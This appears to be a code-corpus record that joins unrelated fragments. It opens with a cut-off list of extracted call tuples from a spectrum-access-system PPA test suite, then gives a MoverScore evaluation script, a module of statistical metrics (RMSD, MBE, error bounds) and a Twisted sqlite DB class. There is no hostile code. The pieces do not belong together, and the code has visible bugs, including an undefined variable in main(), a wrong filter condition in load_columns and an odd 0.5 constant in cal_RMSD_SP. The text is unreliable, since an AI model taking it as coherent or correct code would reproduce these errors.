'full_activity_dump_helper.getFullActivityDumpSasUut', 'getFullActivityDumpSasUut', (['self._sas', 'self._sas_admin', 'ssl_cert', 'ssl_key'], {}), '(self._sas, self._sas_admin, ssl_cert, ssl_key)\n', (7251, 7298), False, 'from full_activity_dump_helper import getFullActivityDumpSasUut\n'), ((8950, 9067), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_a, pal_record_b]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_a, pal_record_b], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (8974, 9067), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10842, 10871), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (10853, 10871), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((11156, 11183), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (11166, 11183), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((12156, 12230), 'reference_models.ppa.ppa.PpaCreationModel', 'ppa.PpaCreationModel', (["config['registrationRequests']", "config['palRecords']"], {}), "(config['registrationRequests'], config['palRecords'])\n", (12176, 12230), False, 'from reference_models.ppa import ppa\n'), ((12746, 12802), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (12759, 12802), False, 'import logging\n'), ((13390, 13430), 'os.path.dirname', 'os.path.dirname', (['ppa_zone_data_file_path'], {}), '(ppa_zone_data_file_path)\n', (13405, 13430), False, 'import os\n'), ((16228, 16345), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_a, pal_record_b]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_a, pal_record_b], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (16252, 16345), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18441, 18470), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (18452, 18470), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18921, 18948), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (18931, 18948), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((19608, 19682), 'reference_models.ppa.ppa.PpaCreationModel', 'ppa.PpaCreationModel', (["config['registrationRequests']", "config['palRecords']"], {}), "(config['registrationRequests'], config['palRecords'])\n", (19628, 19682), False, 'from reference_models.ppa import ppa\n'), ((20210, 20266), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (20223, 20266), False, 'import logging\n'), 
((21904, 21983), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (21916, 21983), False, 'import os\n'), ((23040, 23069), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (23051, 23069), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23520, 23547), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (23530, 23547), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((23718, 23751), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (23728, 23751), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((24592, 24648), 'logging.debug', 'logging.debug', (['"""ppa_id received from SAS UUT:%s"""', 'ppa_id'], {}), "('ppa_id received from SAS UUT:%s', ppa_id)\n", (24605, 24648), False, 'import logging\n'), ((26991, 27108), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_1, pal_record_2]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_1, pal_record_2], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (27015, 27108), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((28984, 29013), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (28995, 29013), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((29416, 29443), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (29426, 29443), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((31255, 31372), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_1, pal_record_2]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_1, pal_record_2], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (31279, 31372), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32478, 32507), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (32489, 32507), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32901, 32928), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (32911, 32928), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((33925, 34004), 'os.path.join', 
'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (33937, 34004), False, 'import os\n'), ((35144, 35173), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (35155, 35173), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35582, 35609), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (35592, 35609), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35780, 35813), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (35790, 35813), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((36842, 36921), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (36854, 36921), False, 'import os\n'), ((37705, 37795), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["overlapping_ppa_contour['features'][0]['geometry']", '(0.01)'], {}), "(overlapping_ppa_contour['features'][0][\n 'geometry'], 0.01)\n", (37732, 37795), False, 'from reference_models.geo import drive, utils\n'), ((38497, 38536), 'util.loadConfig', 'loadConfig', (['pcr_1_test_config_file_path'], {}), '(pcr_1_test_config_file_path)\n', (38507, 38536), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39447, 39476), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (39458, 39476), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39916, 39943), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (39926, 39943), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((40114, 40147), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (40124, 40147), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10747, 10774), 'util.getCertFilename', 'getCertFilename', (['"""sas.cert"""'], {}), "('sas.cert')\n", (10762, 10774), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10805, 10831), 'util.getCertFilename', 'getCertFilename', (['"""sas.key"""'], {}), "('sas.key')\n", (10820, 10831), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((13442, 13480), 
'os.path.exists', 'os.path.exists', (['ppa_zone_data_dir_path'], {}), '(ppa_zone_data_dir_path)\n', (13456, 13480), False, 'import os\n'), ((13488, 13523), 'os.makedirs', 'os.makedirs', (['ppa_zone_data_dir_path'], {}), '(ppa_zone_data_dir_path)\n', (13499, 13523), False, 'import os\n'), ((13907, 13992), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (13917, 13992), False, 'import json\n'), ((14832, 14902), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (14857, 14902), False, 'from reference_models.geo import drive, utils\n'), ((18346, 18373), 'util.getCertFilename', 'getCertFilename', (['"""sas.cert"""'], {}), "('sas.cert')\n", (18361, 18373), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18404, 18430), 'util.getCertFilename', 'getCertFilename', (['"""sas.key"""'], {}), "('sas.key')\n", (18419, 18430), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((20668, 20753), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (20678, 20753), False, 'import json\n'), ((21564, 21634), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (21589, 21634), False, 'from reference_models.geo import drive, utils\n'), ((22732, 22823), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["user_claimed_ppa_contour['features'][0]['geometry']", '(0.01)'], {}), "(user_claimed_ppa_contour['features'][0][\n 'geometry'], 0.01)\n", (22759, 22823), False, 'from reference_models.geo import drive, utils\n'), ((25072, 25157), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (25082, 25157), False, 'import json\n'), ((25251, 25349), 'json.dumps', 'json.dumps', (["config['userClaimedPpaContour']"], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(config['userClaimedPpaContour'], indent=2, sort_keys=False,\n separators=(',', ': '))\n", (25261, 25349), False, 'import json\n'), ((25836, 25906), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (25861, 25906), False, 'from reference_models.geo import drive, utils\n'), ((34833, 34925), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["user_claimed_ppa_contour['features'][0]['geometry']", '(-0.01)'], {}), "(user_claimed_ppa_contour['features'][0][\n 'geometry'], -0.01)\n", (34860, 34925), False, 'from reference_models.geo import drive, utils\n'), ((7853, 7911), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), 
"('testcases', 'testdata', 'pal_record_1.json')\n", (7865, 7911), False, 'import os\n'), ((7957, 8015), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (7969, 8015), False, 'import os\n'), ((8322, 8376), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (8334, 8376), False, 'import os\n'), ((8418, 8472), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (8430, 8472), False, 'import os\n'), ((8512, 8566), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (8524, 8566), False, 'import os\n'), ((13619, 13712), 'json.dumps', 'json.dumps', (["uut_ppa_zone_data['zone']"], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data['zone'], indent=2, sort_keys=False, separators\n =(',', ': '))\n", (13629, 13712), False, 'import json\n'), ((14128, 14165), 'json.loads', 'json.loads', (['test_harness_ppa_geometry'], {}), '(test_harness_ppa_geometry)\n', (14138, 14165), False, 'import json\n'), ((15129, 15187), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (15141, 15187), False, 'import os\n'), ((15233, 15291), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (15245, 15291), False, 'import os\n'), ((15598, 15652), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (15610, 15652), False, 'import os\n'), ((15694, 15748), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (15706, 15748), False, 'import os\n'), ((15790, 15844), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (15802, 15844), False, 'import os\n'), ((20889, 20926), 'json.loads', 'json.loads', (['test_harness_ppa_geometry'], {}), '(test_harness_ppa_geometry)\n', (20899, 20926), False, 'import json\n'), ((22373, 22400), 'json.load', 'json.load', (['claimed_ppa_file'], {}), '(claimed_ppa_file)\n', (22382, 22400), False, 'import json\n'), ((26087, 26145), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (26099, 26145), False, 'import os\n'), ((26191, 26249), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (26203, 26249), False, 'import os\n'), ((26556, 26610), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (26568, 26610), False, 'import os\n'), ((26652, 26706), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (26664, 26706), False, 'import os\n'), ((26748, 26802), 'os.path.join', 'os.path.join', 
(['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (26760, 26802), False, 'import os\n'), ((30342, 30400), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (30354, 30400), False, 'import os\n'), ((30446, 30504), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (30458, 30504), False, 'import os\n'), ((30811, 30865), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (30823, 30865), False, 'import os\n'), ((30907, 30961), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (30919, 30961), False, 'import os\n'), ((34474, 34501), 'json.load', 'json.load', (['claimed_ppa_file'], {}), '(claimed_ppa_file)\n', (34483, 34501), False, 'import json\n'), ((37393, 37423), 'json.load', 'json.load', (['overlapped_ppa_file'], {}), '(overlapped_ppa_file)\n', (37402, 37423), False, 'import json\n'), ((37927, 37985), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""ppa_record_0.json"""'], {}), "('testcases', 'testdata', 'ppa_record_0.json')\n", (37939, 37985), False, 'import os\n'), ((39048, 39060), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (39058, 39060), False, 'import uuid\n'), ((2963, 3049), 'reference_models.geo.drive.census_tract_driver.GetCensusTract', 'drive.census_tract_driver.GetCensusTract', (["pal['license']['licenseAreaIdentifier']"], {}), "(pal['license'][\n 'licenseAreaIdentifier'])\n", (3003, 3049), False, 'from reference_models.geo import drive, utils\n')]
|
# Use the original version with BERTMNLI to reproduce the results.
# from moverscore import get_idf_dict, word_mover_score
# Recommend to use this version (DistilBERT) for evaluation, if the speed is your concern.
# from moverscore_v2 import get_idf_dict, word_mover_score
import sys
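# Drop the script's own directory from sys.path so that `from moverscore import ...` below
# resolves to the installed package rather than this file (the script is invoked as moverscore.py).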
del sys.path[0]
import os
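# The MOVERSCORE environment variable points the moverscore package at a local model checkpoint directory.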
os.environ['MOVERSCORE'] = '/home/xqwang/projects/qgqa/evaluation/moverscore_checkpoint'
import json
from tqdm import tqdm, trange
from moverscore import get_idf_dict, word_mover_score
def moverscore_corpus_level(hyps, refs):
idf_dict_hyp = get_idf_dict(hyps)
idf_dict_ref = get_idf_dict(refs)
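    # word_mover_score returns one score per (reference, hypothesis) pair, aligned with the input order.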
scores = word_mover_score(refs, hyps, idf_dict_ref, idf_dict_hyp,
stop_words=[], n_gram=1, remove_subwords=True)
return scores
def main():
    dump_filename = sys.argv[1]  # take the dump path from the command line, as main_relatedness() does
    with open(dump_filename) as f:
dump_list = eval(f.read())
qgs = [ ]
refs = [ ]
for i, item in enumerate(dump_list):
# reference-free
qg, ref = item['qg'], item['question']
qgs.append(' '.join(qg))
refs.append(' '.join(ref))
moverscore_list = moverscore_corpus_level(qgs, refs)
with open('moverscore.list', 'w') as f:
print(moverscore_list, file = f)
def main_relatedness():
assert len(sys.argv) == 2, 'python moverscore.py /path/to/dump.json'
dump_json_filename = sys.argv[1]
target_dirname = os.path.dirname(dump_json_filename)
with open(dump_json_filename) as f:
dump_json = json.load(f)
contexts = [ ]
refs = [ ]
id_list = [ ]
for i, (qid, item) in enumerate(dump_json.items()):
# reference-free
context, ref = item['context'], item['question']
contexts.append(context[:512]) # ~100 words
refs.append(ref)
id_list.append(qid)
score_list = [ ]
chunk_size = 100
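    # Score in chunks of 100 pairs to keep memory bounded; chunk scores are appended in input order.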
for begin in trange(0, len(contexts), chunk_size):
chunked_contexts, chunked_refs = contexts[begin:begin + chunk_size], refs[begin:begin + chunk_size]
chunked_score = moverscore_corpus_level(chunked_contexts, chunked_refs)
score_list.extend(chunked_score)
print('chunked')
moverscore_relatedness_list = {
qid: { 'value': score }
for qid, score in zip(id_list, score_list)
}
with open(os.path.join(target_dirname, 'moverscore_relatedness.json'), 'w') as f:
json.dump(moverscore_relatedness_list, f, indent = 4)
if __name__ == '__main__':
main_relatedness()
|
[
"json.dump",
"json.load",
"os.path.dirname",
"moverscore.word_mover_score",
"moverscore.get_idf_dict",
"os.path.join"
] |
[((557, 575), 'moverscore.get_idf_dict', 'get_idf_dict', (['hyps'], {}), '(hyps)\n', (569, 575), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((595, 613), 'moverscore.get_idf_dict', 'get_idf_dict', (['refs'], {}), '(refs)\n', (607, 613), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((627, 734), 'moverscore.word_mover_score', 'word_mover_score', (['refs', 'hyps', 'idf_dict_ref', 'idf_dict_hyp'], {'stop_words': '[]', 'n_gram': '(1)', 'remove_subwords': '(True)'}), '(refs, hyps, idf_dict_ref, idf_dict_hyp, stop_words=[],\n n_gram=1, remove_subwords=True)\n', (643, 734), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((1403, 1438), 'os.path.dirname', 'os.path.dirname', (['dump_json_filename'], {}), '(dump_json_filename)\n', (1418, 1438), False, 'import os\n'), ((1500, 1512), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1509, 1512), False, 'import json\n'), ((2384, 2435), 'json.dump', 'json.dump', (['moverscore_relatedness_list', 'f'], {'indent': '(4)'}), '(moverscore_relatedness_list, f, indent=4)\n', (2393, 2435), False, 'import json\n'), ((2304, 2363), 'os.path.join', 'os.path.join', (['target_dirname', '"""moverscore_relatedness.json"""'], {}), "(target_dirname, 'moverscore_relatedness.json')\n", (2316, 2363), False, 'import os\n')]
|
'''
File: cal_metrics.py
Author: <NAME>
Version: 0.1
Create: 2014-01-03 11:12:17
Description: Calculating the statistical metrics
'''
# updated (2014-01-03 11:12:29): updated the code
import logging
def cal_error_bound_2d(x, y, scale):
'''
calculate error budget based on x time of the Landsat and MODIS values
squrt(quad(0.005 + 0.05 * landsat) + quad(0.005 + 0.05 * modis))
'''
_count = 0
for i in range(len(x)):
_x = x[i]
_y = y[i]
_err_x = (0.005 + 0.05 * _x)
_err_y = (0.005 + 0.05 * _y)
_err_a = scale * (((_err_x ** 2) + (_err_y ** 2)) ** 0.5)
if _y > _x - _err_a and _y < _x + _err_a:
_count += 1
return float(_count) / len(x)
def cal_error_bound(x, y, scale):
'''calculate error budget based on x time of MODIS value'''
_count = 0
for i in range(len(x)):
_x = x[i]
_y = y[i]
_err = scale * (0.005 + 0.05 * _x)
if _y > _x - _err and _y < _x + _err:
_count += 1
return float(_count) / len(x)
def cal_RMSD_SP(x, y):
'''calculate RMSD SP'''
_t = 0
for i in range(len(x)):
_t += (0.005+0.5*x[i])**2 + (0.005+0.5*y[i])**2
return (_t / len(x)) ** 0.5
def cal_MBE(xs, ys):
'''calcualte MBE, returns MBE (mean bias error) and S2d (distribution of differences)'''
_t = 0
for i in range(len(xs)):
_t += (xs[i] - ys[i])
_t /= len(xs)
_s = 0
for i in range(len(xs)):
_s += (xs[i] - ys[i] - _t) ** 2
_s /= len(xs) - 1
return _t, _s
def cal_RMSD(x, y):
'''calculate RMSD'''
_v = 0
for i in range(len(x)):
_v += (x[i] - y[i]) ** 2
    return (_v / len(x)) ** 0.5
def cal_RMSDs(x, y, slope, offset):
'''return RMSD RMSDs RMSDu'''
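    # Willmott-style decomposition: RMSDs is the systematic part (regression prediction vs. x)
    # and RMSDu the unsystematic part (y vs. regression prediction); the first return value is
    # sqrt(RMSDs**2 + RMSDu**2).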
_s = 0
_u = 0
for i in range(len(x)):
_p = x[i] * slope + offset
_s += (x[i] - _p) ** 2
_u += (y[i] - _p) ** 2
_s /= len(x)
_u /= len(x)
return (_s + _u) ** 0.5, _s ** 0.5, _u ** 0.5
def average(x):
return sum(x) / len(x)
def float_columns(cs, scale=1.0, min_v=None, max_v=None):
_ts = [[] for _v in range(len(cs))]
_len = min([len(_vs) for _vs in cs])
for i in range(_len):
try:
_vs = [float(cs[_b][i]) * scale for _b in range(len(cs))]
if min_v != None and any([_v < min_v for _v in _vs]):
continue
if max_v != None and any([_v > max_v for _v in _vs]):
continue
            for _b in range(len(_vs)):
                _ts[_b].append(_vs[_b])
except ValueError:
continue
return _ts
def float_column(vs, scale=1.0, min_v=None, max_v=None):
return float_columns([vs], scale, min_v, max_v)[0]
def load_columns(f, sep=',', has_header=True, columns=None, callback=None):
'''load the values from a text file. If the file include a header line, return a dict; otherwise, return a column list'''
_cs = None
_ts = None
_ss = None
with open(f) as _fi:
_no = 0
for _l in _fi.read().splitlines():
_no += 1
if not _l:
continue
_vs = _l.split(sep)
if _cs == None:
_cs = [[] for _v in _vs]
if has_header:
_ts = _vs
else:
_ts = list(range(len(_cs)))
if columns:
_ss = [_ts.index(_c) for _c in columns if _c in columns]
if has_header:
continue
if len(_vs) < len(_cs):
                logging.warning('insufficient values at line %s' % _no)
continue
if callback:
if callback(_no, _ts, _vs) == False:
continue
for i in range(len(_vs)):
if (_ss == None) or (i in _ss):
_cs[i].append(_vs[i])
logging.info('process %s lines' % _no)
if _cs == None:
logging.warning('no values loaded')
return None
if columns:
for _c in [_c for _c in _ts if _c not in columns]:
_id = _ts.index(_c)
assert(_id >= 0)
del _ts[_id], _cs[_id]
return dict(list(zip(_ts, _cs)))
|
[
"logging.warning",
"logging.info"
] |
[((3461, 3499), 'logging.info', 'logging.info', (["('process %s lines' % _no)"], {}), "('process %s lines' % _no)\n", (3473, 3499), False, 'import logging\n'), ((3523, 3558), 'logging.warning', 'logging.warning', (['"""no values loaded"""'], {}), "('no values loaded')\n", (3538, 3558), False, 'import logging\n'), ((3214, 3268), 'logging.warning', 'logging.warning', (["('insufficent values at line %s' % _no)"], {}), "('insufficent values at line %s' % _no)\n", (3229, 3268), False, 'import logging\n')]
|
import pickle
import json
import sqlite3
from twisted.enterprise import adbapi
class DB:
filename = "skynet.db"
_db = None
_ready = False
@staticmethod
def get_db():
if DB._db is None:
def callb(con):
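                # sqlite3.Row lets result rows be accessed by column name (e.g. row["id"]) as well as by index.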
con.row_factory = sqlite3.Row
DB._db = adbapi.ConnectionPool("sqlite3", DB.filename, cp_openfun=callb)
d = DB._db.runInteraction(DB.init_db)
d.addCallback(DB._init_db_callback)
return DB._db
@staticmethod
def init_db(txn):
txn.execute('''CREATE TABLE IF NOT EXISTS DeviceServers
(id INTEGER PRIMARY KEY, ip TEXT, port INTEGER, name TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS ControlServers
(id INTEGER PRIMARY KEY, ip TEXT, name TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS Methods
(id INTEGER PRIMARY KEY, name TEXT, Arguments TEXT, control_server INTEGER)''')
txn.execute('''CREATE TABLE IF NOT EXISTS Devices
(id INTEGER PRIMARY KEY, name TEXT, device_server INTEGER,
device_id TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS RawData
(id INTEGER PRIMARY KEY, device INTEGER , field TEXT,
value TEXT, date INTEGER DEFAULT (strftime('%s')))''')
txn.execute('''CREATE TABLE IF NOT EXISTS Scripts
(id INTEGER PRIMARY KEY, script TEXT)''')
@staticmethod
def _init_db_callback(res):
DB._ready = True
@staticmethod
def _check_db_ready():
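        # Spin until the schema-creation interaction started in get_db() has completed
        # (DB._ready is set by _init_db_callback).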
while not DB._ready:
pass
@staticmethod
def get_device_servers():
db = DB.get_db()
return db.runInteraction(DB._get_device_servers)
@staticmethod
def _get_device_servers(txn):
DB._check_db_ready()
txn.execute('''SELECT * FROM DeviceServers''')
return txn.fetchall()
@staticmethod
def get_local_devid_from_remote(ip, devid):
db = DB.get_db()
return db.runInteraction(DB._get_local_devid_from_remote, ip, devid)
@staticmethod
def _get_local_devid_from_remote(txn, ip, devid):
DB._check_db_ready()
txn.execute('''SELECT id from DeviceServers WHERE ip = ? ''', (ip,))
devsid = txn.fetchone()[0]
txn.execute('''SELECT id from Devices WHERE device_server = ? AND device_id = ?''', (devsid, devid))
return txn.fetchone()[0]
@staticmethod
def get_field_value(devid, field):
db = DB.get_db()
return db.runInteraction(DB._get_field_value, devid, field)
@staticmethod
def _get_field_value(txn, devid, field):
DB._check_db_ready()
        txn.execute('''SELECT value FROM RawData WHERE device = ? AND field = ? ORDER BY id DESC''', (devid, field))
return txn.fetchone()[0]
@staticmethod
def add_script(script):
db = DB.get_db()
return db.runInteraction(DB._add_script, script)
@staticmethod
def _add_script(txn, script):
DB._check_db_ready()
s = pickle.dumps(script)
txn.execute('''INSERT INTO Scripts (script) VALUES (?)''', (s,))
script.id = txn.lastrowid
